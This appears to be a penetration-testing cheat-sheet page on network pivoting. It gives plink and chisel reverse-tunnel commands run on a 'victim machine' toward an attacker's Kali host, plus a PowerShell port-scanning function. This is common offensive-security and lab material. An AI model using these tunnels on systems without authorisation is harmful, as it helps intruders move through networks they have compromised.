pwny.cc
Search…
Network
1
#10.10.10.19 == kali_IP. 8888 == Port to redirect.
2
.\plink.exe -l root -pw toor 10.10.10.19 -N -R 8888:127.0.0.1:8888
Copied!
https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe
Plink - Windows 32bits download

Chisel TCP tunnel over HTTP

1
#Download chisel for victim machine version
2
#10.10.10.19 == kali_IP. 4506 == Port to redirect.
3
.\chisel client 10.10.10.19:10000 R:4506:127.0.0.1:4506 //In Victim Machine
4
.\chisel server -p 10000 --reverse //In Kali Machine
Copied!
Releases · jpillora/chisel
GitHub
Chisel - Releases

Scan ports from Powershell

1
function Test-Port {
2
$computer=Read-Host "[*] IP Address:"
3
$port=Read-Host "[*] Port Numbers (separate them by comma):"
4
$port.split(',') | Foreach-Object -Process {If (($a=Test-NetConnection $computer -Port $_ -WarningAction SilentlyContinue).tcpTestSucceeded -eq $true) {Write-Host $a.Computername $a.RemotePort -ForegroundColor Green -Separator " ==> "} else {Write-Host $a.Computername $a.RemotePort -Separator " ==> " -ForegroundColor Red}}
5
}
Copied!